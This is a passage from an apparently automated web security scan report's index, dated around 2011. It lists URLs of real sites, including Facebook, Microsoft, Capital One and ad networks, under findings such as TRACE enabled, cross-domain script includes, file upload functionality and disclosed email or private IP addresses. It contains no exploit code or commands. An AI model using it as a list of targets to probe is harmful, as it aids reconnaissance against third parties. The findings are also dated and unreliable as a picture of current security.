18.46. http://bs.serving-sys.com/BurstingPipe/adServer.bs

18.47. http://cm.g.doubleclick.net/pixel

18.48. http://cm.g.doubleclick.net/pixel

18.49. http://cm.g.doubleclick.net/pixel

18.50. https://code.google.com/p/domsnitch/downloads/detail

18.51. http://consultants-locator.apple.com/index.php

18.52. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.53. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.54. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.55. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.56. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.57. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.58. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.59. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.60. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.61. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.62. http://d.101m3.com/afr.php

18.63. http://d.101m3.com/afr.php

18.64. http://d.101m3.com/afr.php

18.65. http://dg.specificclick.net/

18.66. http://dinclinx.com/

18.67. http://googleads.g.doubleclick.net/pagead/ads

18.68. http://googleads.g.doubleclick.net/pagead/ads

18.69. http://googleads.g.doubleclick.net/pagead/ads

18.70. http://googleads.g.doubleclick.net/pagead/ads

18.71. http://googleads.g.doubleclick.net/pagead/ads

18.72. http://googleads.g.doubleclick.net/pagead/ads

18.73. http://googleads.g.doubleclick.net/pagead/ads

18.74. http://googleads.g.doubleclick.net/pagead/ads

18.75. http://googleads.g.doubleclick.net/pagead/ads

18.76. http://googleads.g.doubleclick.net/pagead/ads

18.77. http://googleads.g.doubleclick.net/pagead/ads

18.78. http://googleads.g.doubleclick.net/pagead/ads

18.79. http://greatponds.squarespace.com/universal/scripts/global.js

18.80. http://hipservice.live.com/gethip.srf

18.81. http://home.live.com/search

18.82. http://home.live.com/search/hip

18.83. http://ib.adnxs.com/if

18.84. http://ib.adnxs.com/ptj

18.85. http://ib.adnxs.com/ptj

18.86. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js

18.87. http://maps.google.com/maps

18.88. http://media.fastclick.net/w/get.media

18.89. http://mediacdn.disqus.com/1311185431/build/system/disqus.js

18.90. http://mediacdn.disqus.com/1311376479/build/system/disqus.js

18.91. http://my.seashepherd.org/NetCommunity/Page.aspx

18.92. http://oascentral.discovery.com/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70

18.93. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx

18.94. http://pixel.everesttech.net/2368/gr

18.95. http://pixel.invitemedia.com/admeld_sync

18.96. http://platform0.twitter.com/widgets/follow_button.html

18.97. http://player.vimeo.com/video/18305022

18.98. http://player.vimeo.com/video/25752549

18.99. http://player.vimeo.com/video/26341323

18.100. http://player.vimeo.com/video/8022406

18.101. http://rad.msn.com/ADSAdClient31.dll

18.102. http://rad.msn.com/ADSAdClient31.dll

18.103. http://rad.msn.com/ADSAdClient31.dll

18.104. http://rad.msn.com/ADSAdClient31.dll

18.105. http://rad.msn.com/ADSAdClient31.dll

18.106. http://rad.msn.com/ADSAdClient31.dll

18.107. http://rad.msn.com/ADSAdClient31.dll

18.108. http://rad.msn.com/ADSAdClient31.dll

18.109. http://rad.msn.com/ADSAdClient31.dll

18.110. http://rad.msn.com/ADSAdClient31.dll

18.111. http://rad.msn.com/ADSAdClient31.dll

18.112. http://rd.apmebf.com/w/get.media

18.113. http://scmagazineus.disqus.com/combination_widget.js

18.114. http://showadsak.pubmatic.com/AdServer/AdServerServlet

18.115. http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css

18.116. http://social.msdn.microsoft.com/Search/en-US

18.117. http://social.msdn.microsoft.com/Search/en-US

18.118. http://social.msdn.microsoft.com/Search/en-US

18.119. http://social.msdn.microsoft.com/Search/en-US/en-USebb6e

18.120. http://social.msdn.microsoft.com/search/en-US

18.121. http://static.curse.com/themes/common/v6/scripts/core.js

18.122. http://syndication.jobthread.com/jt/syndication/page.php

18.123. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

18.124. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

18.125. http://visualstudiogallery.msdn.microsoft.com/site/search

18.126. http://visualstudiogallery.msdn.microsoft.com/site/search

18.127. http://widgets.klout.com/

18.128. http://www.bing.com/search

18.129. http://www.boston.com/dynamicassembly/sitepath54/js_output.js

18.130. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

18.131. http://www.capitalone.com/directbanking/

18.132. http://www.datacard.com/combined.js

18.133. http://www.facebook.com/connect/connect.php

18.134. http://www.facebook.com/connect/connect.php

18.135. http://www.facebook.com/connect/connect.php

18.136. http://www.facebook.com/connect/connect.php

18.137. http://www.facebook.com/plugins/comments.php

18.138. http://www.facebook.com/plugins/comments.php

18.139. http://www.facebook.com/plugins/comments.php

18.140. http://www.facebook.com/plugins/comments.php

18.141. http://www.facebook.com/plugins/comments.php

18.142. http://www.facebook.com/plugins/comments.php

18.143. http://www.facebook.com/plugins/comments.php

18.144. http://www.facebook.com/plugins/comments.php

18.145. http://www.facebook.com/plugins/comments.php

18.146. http://www.facebook.com/plugins/comments.php

18.147. http://www.facebook.com/plugins/comments.php

18.148. http://www.facebook.com/plugins/comments.php

18.149. http://www.facebook.com/plugins/comments.php

18.150. http://www.facebook.com/plugins/comments.php

18.151. http://www.facebook.com/plugins/comments.php

18.152. http://www.facebook.com/plugins/comments.php

18.153. http://www.facebook.com/plugins/comments.php

18.154. http://www.facebook.com/plugins/comments.php

18.155. http://www.facebook.com/plugins/comments.php

18.156. http://www.facebook.com/plugins/comments.php

18.157. http://www.facebook.com/plugins/comments.php

18.158. http://www.facebook.com/plugins/comments.php

18.159. http://www.facebook.com/plugins/comments.php

18.160. http://www.facebook.com/plugins/comments.php

18.161. http://www.facebook.com/plugins/fan.php

18.162. http://www.facebook.com/plugins/like.php

18.163. http://www.facebook.com/plugins/likebox.php

18.164. http://www.facebook.com/plugins/likebox.php

18.165. http://www.facebook.com/plugins/likebox.php

18.166. http://www.facebook.com/plugins/likebox.php

18.167. http://www.google.com/search

18.168. http://www.google.com/search

18.169. http://www.google.com/search

18.170. http://www.google.com/search

18.171. http://www.google.com/search

18.172. http://www.google.com/url

18.173. http://www.google.com/url

18.174. http://www.google.com/url

18.175. http://www.greatpondsma.org/universal/scripts/global.js

18.176. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

18.177. http://www.lifescript.com/adcontrol.htm

18.178. http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx

18.179. http://www.microsoft.com/en-us/homepage/Components/Grid/Home.asch

18.180. http://www.microsoft.com/en-us/homepage/Components/Grid/Work-Business.asch

18.181. http://www.microsoft.com/en-us/security_essentials/Search.aspx

18.182. http://www.microsoft.com/en-us/security_essentials/default.aspx

18.183. http://www.myyearbook.com/advertising/default.php

18.184. http://www.nmmlaw.com/index.php

18.185. http://www.paloaltonetworks.com/cam/switch/index.php

18.186. http://www.scmagazineus.com/js/scripts.js

18.187. http://www.silverlight.net/silverlight-adchain.html

18.188. http://www.silverlight.net/silverlight-adchain.html

18.189. http://www.treehugger.com/galleries/

18.190. http://www.treehugger.com/science_technology/

18.191. http://www.treehugger.com/travel_nature/

18.192. http://www.youtube.com/embed/6hCRafyV0zI

18.193. http://www.youtube.com/embed/pDXWOjC-AlA

19. Cross-domain script include

19.1. http://a.fsdn.com/adops/google/rev2/afc/sf_google_afc.js

19.2. http://a.netmng.com/hic/

19.3. http://a.netmng.com/hic/

19.4. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33

19.5. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10

19.6. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11

19.7. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12

19.8. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16

19.9. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17

19.10. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html

19.11. http://aka-cdn-ns.adtechus.com/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile2.js

19.12. http://analytics.microsoft.com/Sync.html

19.13. http://analytics.msn.com/Include.html

19.14. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

19.15. http://assets.tumblr.com/iframe.html

19.16. http://betaworks.com/

19.17. http://c627028.r28.cf2.rackcdn.com/google28reddefaultsUSA728x90.html

19.18. http://c627028.r28.cf2.rackcdn.com/google29reddefaultsUSA728x90.html

19.19. http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html

19.20. https://code.google.com/p/domsnitch/downloads/detail

19.21. https://code.google.com/p/domsnitch/downloads/list

19.22. http://code.msdn.microsoft.com/

19.23. http://consultants-locator.apple.com/index.php

19.24. http://corp.klout.com/blog/

19.25. http://corp.klout.com/careers

19.26. http://corp.klout.com/contact

19.27. http://corp.klout.com/kscore

19.28. http://corp.klout.com/perks

19.29. http://corp.klout.com/press

19.30. http://corp.klout.com/privacy

19.31. http://corp.klout.com/terms

19.32. http://games.myyearbook.com/

19.33. http://games.myyearbook.com/landing/pool

19.34. http://geek.net/

19.35. http://go.ionearth.com/

19.36. http://googleads.g.doubleclick.net/pagead/ads

19.37. http://googleads.g.doubleclick.net/pagead/ads

19.38. http://home.live.com/search

19.39. http://home.live.com/search/hip

19.40. http://ib.adnxs.com/if

19.41. http://keepitfresh.frid.ge/

19.42. http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx

19.43. http://my.seashepherd.org/NetCommunity/Page.aspx

19.44. http://oascentral.discovery.com/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70

19.45. http://player.vimeo.com/video/18305022

19.46. http://player.vimeo.com/video/25752549

19.47. http://player.vimeo.com/video/26341323

19.48. http://player.vimeo.com/video/8022406

19.49. http://research.microsoft.com/en-us/

19.50. http://research.microsoft.com/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx

19.51. http://research.microsoft.com/en-us/events/fs2011/default.aspx

19.52. http://research.microsoft.com/en-us/events/fs2011/demofest.aspx

19.53. http://s1.lqcdn.com/m.min.js

19.54. http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css

19.55. http://social.msdn.microsoft.com/Search/en-US

19.56. http://social.msdn.microsoft.com/search/en-US/en-USebb6e

19.57. http://sourceforge.net/projects/hoytllc-vcloud/

19.58. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

19.59. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/

19.60. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description

19.61. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

19.62. http://visualstudiogallery.msdn.microsoft.com/site/search

19.63. http://widgets.klout.com/

19.64. http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx

19.65. http://www.asp.net/ajax

19.66. http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/

19.67. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

19.68. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/

19.69. http://www.datacard.com/

19.70. http://www.facebook.com/connect/connect.php

19.71. http://www.facebook.com/connect/connect.php

19.72. http://www.facebook.com/plugins/comments.php

19.73. http://www.facebook.com/plugins/comments.php

19.74. http://www.facebook.com/plugins/fan.php

19.75. http://www.facebook.com/plugins/likebox.php

19.76. http://www.hitcon.org/hit2011/

19.77. http://www.hitcon.org/hit2011/download.html

19.78. http://www.jackhenry.com/

19.79. http://www.jackhenrybanking.com/

19.80. http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx

19.81. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

19.82. http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx

19.83. http://www.lifescript.com/adcontrol.htm

19.84. http://www.m86security.com/products/web_security/m86-web-filtering-reporting-suite.asp

19.85. http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx

19.86. http://www.microsoft.com/en-us/default.aspx

19.87. http://www.microsoft.com/en-us/security_essentials/Search.aspx

19.88. http://www.microsoft.com/en-us/security_essentials/Support.aspx

19.89. http://www.microsoft.com/en-us/security_essentials/default.aspx

19.90. http://www.myyearbook.com/advertising/default.php

19.91. http://www.nmmlaw.com/index.php

19.92. http://www.observer.com/

19.93. http://www.paloaltonetworks.com/cam/switch/index.php

19.94. http://www.scmagazineus.com/

19.95. http://www.seashepherd.org/

19.96. http://www.seashepherd.org/media/js/jquery.prettyPhoto.js

19.97. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263

19.98. http://www.seashepherd.org/popups/mobile-signup-lightbox/

19.99. http://www.silverpop.com/

19.100. http://www.silverpop.com/demo/index.html

19.101. http://www.silverpop.com/marketing-resources/index.html

19.102. http://www.silverpop.com/tweets.html

19.103. http://www.treehugger.com/daylife/related/72065.html

19.104. http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php

19.105. http://www.treehugger.com/galleries/

19.106. http://www.treehugger.com/science_technology/

19.107. http://www.treehugger.com/travel_nature/

19.108. http://www.uscgnews.com/go/doc/786/1135035/

19.109. http://www.youtube.com/embed/6hCRafyV0zI

19.110. http://www.youtube.com/embed/pDXWOjC-AlA

19.111. http://www.youtube.com/embed/terD85scv4w

20. File upload functionality

20.1. http://a.fsdn.com/con/js/min/sf.js

20.2. http://mediacdn.disqus.com/1311382870/build/system/upload.html

20.3. http://sourceforge.net/projects/hoytllc-vcloud/

21. TRACE method is enabled

21.1. http://cheetah.vizu.com/

21.2. http://forums-test.vostu.com/

21.3. http://forums.vostu.com/

21.4. http://mm.chitika.net/

21.5. http://pixel.everesttech.net/

21.6. http://pixel1350.everesttech.net/

21.7. http://puma.vizu.com/

21.8. http://web2.checkm8.com/

22. Email addresses disclosed

22.1. http://ads1.msn.com/library/dap.js

22.2. http://betaworks.com/

22.3. http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js

22.4. http://clients.mobilecause.com/lists/1227/subscriptions/web.js

22.5. https://code.google.com/p/domsnitch/downloads/detail

22.6. http://code.msdn.microsoft.com/

22.7. http://consultants-locator.apple.com/javascript/yui/accordionview.js

22.8. http://consultants.apple.com/jquery.innerfade.js

22.9. http://corp.klout.com/blog/

22.10. http://corp.klout.com/blog/wp-content/themes/klout/blog.css

22.11. http://corp.klout.com/press

22.12. http://corp.klout.com/privacy

22.13. http://forums.vostu.com/

22.14. http://frid.ge/scripts/fridge-combined.1311259715.js

22.15. http://i1.asp.net/umbraco-script/msc_all.js

22.16. http://i1.code.msdn.s-msft.com/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js

22.17. http://i1.codeplex.com/scripts/v17950/i7/ScriptLoader.ashx

22.18. http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js

22.19. http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js

22.20. http://i2.msdn.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js

22.21. http://i2.msdn.microsoft.com/Platform/Controls/Omniture/resources/MSDN/omni_rsid_msdn-bn20110713.js

22.22. http://i2.silverlight.net/scripts/omniture.js

22.23. http://images.apple.com/global/scripts/lib/event_mixins.js

22.24. http://images.apple.com/global/scripts/lib/scriptaculous.js

22.25. http://js.wlxrs.com/~Live.SiteContent.ID/~16.1.11/~/~/~/~/js/Main_WLStrings_JS1033.js

22.26. http://keepitfresh.frid.ge/

22.27. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/357c/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js

22.28. http://mediacdn.disqus.com/1311185431/build/system/disqus.js

22.29. http://mediacdn.disqus.com/1311376479/build/system/disqus.js

22.30. https://onlinebanking.capitalone.com/CapitalOne/Enrollment.aspx

22.31. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110719191037.js

22.32. http://sj.wsj.net/djscript/require/j_global_slim/version/20110721222540.js

22.33. http://storeimages.apple.com/1867/store.apple.com/rs/js/store/release/apple.js

22.34. http://widgets.twimg.com/j/2/widget.js

22.35. http://www.articleonepartners.com/sidebar-modules/get_blog_json.php

22.36. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

22.37. http://www.capitalone.com/contactus/index.php

22.38. http://www.capitalone.com/css/footer.css

22.39. http://www.capitalone.com/css/framework/base.css

22.40. http://www.capitalone.com/css/framework/grid.css

22.41. http://www.capitalone.com/css/framework/print.css

22.42. http://www.capitalone.com/css/header.css

22.43. http://www.capitalone.com/css/page-nav-heading.css

22.44. http://www.capitalone.com/scripts/https-common/jquery/tooltip/bgiframe.js

22.45. https://www.capitalone.com/css/footer.css

22.46. https://www.capitalone.com/css/framework/base.css

22.47. https://www.capitalone.com/css/framework/grid.css

22.48. https://www.capitalone.com/css/framework/print.css

22.49. https://www.capitalone.com/css/header.css

22.50. https://www.capitalone.com/css/page-nav-heading.css

22.51. https://www.capitalone.com/css/page-type/homepage.css

22.52. http://www.google.com/search

22.53. https://www.google.com/accounts/ServiceLogin

22.54. http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx

22.55. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

22.56. http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx

22.57. http://www.lifescript.com/js/jquery.innerfade.js

22.58. http://www.observer.com/

22.59. http://www.paloaltonetworks.com/js/plugins/jquery.colorbox.js

22.60. http://www.scmagazineus.com/

22.61. http://www.silverpop.com/Scripts/new-banners.js

22.62. http://www.silverpop.com/preferences_sf/preferences_sf.js.php

22.63. http://www.treehugger.com/h-code.js

22.64. http://www.treehugger.com/scripts/colorbox/jquery.colorbox.js

22.65. http://www.vostu.com/en/

22.66. http://www.vostu.com/en/2011/04/20/megacity-takes-brazil-by-storm/

22.67. http://www.vostu.com/en/news/

23. Private IP addresses disclosed

23.1. http://api.facebook.com/restserver.php

23.2. http://api.facebook.com/restserver.php

23.3. http://api.facebook.com/restserver.php

23.4. http://api.facebook.com/restserver.php

23.5. http://api.facebook.com/restserver.php

23.6. http://api.facebook.com/restserver.php

23.7. http://assets.0.mybcdna.com//images/HomeBeforeLogin/btn_sign_up_free.png

23.8. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

23.9. http://assets.0.mybcdna.com/images/games/tiles/19_medium.gif

23.10. http://assets.0.mybcdna.com/images/games/tiles/57_medium.gif

23.11. http://assets.2.mybcdna.com//images/favicon.ico

23.12. http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css

23.13. http://assets.2.mybcdna.com/images/Connect/hbl_login_divider.png

23.14. http://assets.2.mybcdna.com/images/HomeBeforeLogin/background_content.png

23.15. http://assets.2.mybcdna.com/images/HomeBeforeLogin/feed_logos.png

23.16. http://assets.2.mybcdna.com/images/HomeBeforeLogin/feed_nav_icons.png

23.17. http://assets.2.mybcdna.com/images/HomeBeforeLogin/login_button.png

23.18. http://assets.2.mybcdna.com/images/Navbar/nav_sprite_default.png

23.19. http://assets.2.mybcdna.com/images/games/tiles/81_medium.gif

23.20. http://assets.2.mybcdna.com/images/gradient_sprite.png

23.21. http://assets.2.mybcdna.com/images/header_sprite.png

23.22. http://assets.3.mybcdna.com/images/PremiumGifts/pg_wrap2_orange.jpg

23.23. http://assets.5.mybcdna.com/images/PremiumGifts/pg_wrap2_summer2.jpg

23.24. http://assets.6.mybcdna.com/images/games/tiles/30_medium.gif

23.25. http://assets.myyearbook.com/images/games/partnerAds/fourplay.png

23.26. http://assets.myyearbook.com/nerve/css/nerve.css

23.27. http://assets.myyearbook.com/nerve/js/nerve.js

23.28. http://ch2lb.checkm8.com/adam/cm8_detect_ad.js

23.29. http://ch2lb.checkm8.com/data/420913/presitial_SC_logo.gif

23.30. http://ch2lb.checkm8.com/data/442707/Nom_640x480.gif

23.31. http://connect.facebook.net/en_US/all.js

23.32. http://connect.facebook.net/en_US/all.js

23.33. http://connect.facebook.net/en_US/all.js

23.34. http://connect.facebook.net/en_US/all.js

23.35. http://connect.facebook.net/en_US/all.js

23.36. http://games.myyearbook.com/

23.37. http://games.myyearbook.com/landing/pool

23.38. http://home.myyearbook.com/Countries

23.39. http://home.myyearbook.com/favicon.ico

23.40. http://home.myyearbook.com/feed/giftFeedItems

23.41. http://home.myyearbook.com/feed/myMagFeedItems

23.42. http://home.myyearbook.com/feed/tvFeedItems

23.43. http://myyearbook.com/

23.44. http://player.vimeo.com/video/18305022

23.45. http://player.vimeo.com/video/25752549

23.46. http://player.vimeo.com/video/25752549

23.47. http://player.vimeo.com/video/26341323

23.48. http://player.vimeo.com/video/8022406

23.49. http://player.vimeo.com/video/8022406

23.50. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif

23.51. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif

23.52. http://research.microsoft.com/en-us/

23.53. http://research.microsoft.com/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx

23.54. http://research.microsoft.com/en-us/events/fs2011/default.aspx

23.55. http://research.microsoft.com/en-us/events/fs2011/demofest.aspx

23.56. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

23.57. http://static.ak.fbcdn.net/connect.php/css/share-button-css

23.58. http://static.ak.fbcdn.net/connect.php/js/FB.Share

23.59. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.60. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.61. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.62. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.63. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.64. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.65. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.66. http://static.ak.fbcdn.net/images/connect_sprite.png

23.67. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js

23.68. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/C0OtqEd7THh.css

23.69. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css

23.70. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js

23.71. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/v3AaEMJaNiA.js

23.72. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js

23.73. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/yGAzEWR0-5b.js

23.74. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css

23.75. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css

23.76. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css

23.77. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css

23.78. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/znpKCeUuNfm.css

23.79. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/znpKCeUuNfm.css

23.80. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css

23.81. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/AQsou8r87UO.js

23.82. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css

23.83. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/ay94DQdlwaE.js

23.84. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css

23.85. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css

23.86. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/myfphzY3EFO.js

23.87. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js

23.88. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

23.89. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

23.90. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/jsZvfR86-A1.js

23.91. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/jsZvfR86-A1.js

23.92. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png

23.93. http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/FGFbc80dUKj.png

23.94. http://static.ak.fbcdn.net/rsrc.php/v1/zN/r/BAsr4eOOsw6.png

23.95. http://static.ak.fbcdn.net/rsrc.php/v1/zW/r/0t0iUYDtV0L.png

23.96. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

23.97. http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/_IKHHfAgFQe.png

23.98. http://static.ak.fbcdn.net/rsrc.php/v1/zj/r/FSEB6oLTK3I.png

23.99. http://takeover.myyearbook.com/6443/main_image.jpg

23.100. http://web2.checkm8.com/adam/detect

23.101. http://web2.checkm8.com/adam/em/ad_play/442707/cat=47183/uhook=6DF1BDD4075B/criterias=32_0_43_3_103_18_104_12_116_225_117_225045_118_1_120_4000000100_122_4225045100_280_22_282_0_283_0_/ord=8851318688487949

23.102. http://web2.checkm8.com/dispatcher_scripts/browserDataDetect.js

23.103. http://www.facebook.com/connect/connect.php

23.104. http://www.facebook.com/connect/connect.php

23.105. http://www.facebook.com/connect/connect.php

23.106. http://www.facebook.com/connect/connect.php

23.107. http://www.facebook.com/extern/login_status.php

23.108. http://www.facebook.com/extern/login_status.php

23.109. http://www.facebook.com/extern/login_status.php

23.110. http://www.facebook.com/extern/login_status.php

23.111. http://www.facebook.com/extern/login_status.php

23.112. http://www.facebook.com/extern/login_status.php

23.113. http://www.facebook.com/extern/login_status.php

23.114. http://www.facebook.com/extern/login_status.php

23.115. http://www.facebook.com/extern/login_status.php

23.116. http://www.facebook.com/extern/login_status.php

23.117. http://www.facebook.com/plugins/comments.php

23.118. http://www.facebook.com/plugins/comments.php

23.119. http://www.facebook.com/plugins/comments.php

23.120. http://www.facebook.com/plugins/comments.php

23.121. http://www.facebook.com/plugins/comments.php

23.122. http://www.facebook.com/plugins/comments.php

23.123. http://www.facebook.com/plugins/comments.php

23.124. http://www.facebook.com/plugins/comments.php

23.125. http://www.facebook.com/plugins/comments.php

23.126. http://www.facebook.com/plugins/comments.php

23.127. http://www.facebook.com/plugins/comments.php

23.128. http://www.facebook.com/plugins/comments.php

23.129. http://www.facebook.com/plugins/comments.php

23.130. http://www.facebook.com/plugins/comments.php

23.131. http://www.facebook.com/plugins/comments.php

23.132. http://www.facebook.com/plugins/comments.php

23.133. http://www.facebook.com/plugins/comments.php

23.134. http://www.facebook.com/plugins/comments.php

23.135. http://www.facebook.com/plugins/comments.php

23.136. http://www.facebook.com/plugins/comments.php

23.137. http://www.facebook.com/plugins/comments.php

23.138. http://www.facebook.com/plugins/comments.php

23.139. http://www.facebook.com/plugins/comments.php

23.140. http://www.facebook.com/plugins/comments.php

23.141. http://www.facebook.com/plugins/comments.php

23.142. http://www.facebook.com/plugins/fan.php

23.143. http://www.facebook.com/plugins/like.php

23.144. http://www.facebook.com/plugins/like.php

23.145. http://www.facebook.com/plugins/like.php

23.146. http://www.facebook.com/plugins/like.php

23.147. http://www.facebook.com/plugins/like.php

23.148. http://www.facebook.com/plugins/like.php

23.149. http://www.facebook.com/plugins/like.php

23.150. http://www.facebook.com/plugins/like.php

23.151. http://www.facebook.com/plugins/like.php

23.152. http://www.facebook.com/plugins/like.php

23.153. http://www.facebook.com/plugins/like.php

23.154. http://www.facebook.com/plugins/like.php

23.155. http://www.facebook.com/plugins/like.php

23.156. http://www.facebook.com/plugins/like.php

23.157. http://www.facebook.com/plugins/like.php

23.158. http://www.facebook.com/plugins/like.php

23.159. http://www.facebook.com/plugins/like.php

23.160. http://www.facebook.com/plugins/like.php

23.161. http://www.facebook.com/plugins/like.php

23.162. http://www.facebook.com/plugins/like.php

23.163. http://www.facebook.com/plugins/like.php

23.164. http://www.facebook.com/plugins/like.php

23.165. http://www.facebook.com/plugins/like.php

23.166. http://www.facebook.com/plugins/like.php

23.167. http://www.facebook.com/plugins/like.php

23.168. http://www.facebook.com/plugins/like.php

23.169. http://www.facebook.com/plugins/like.php

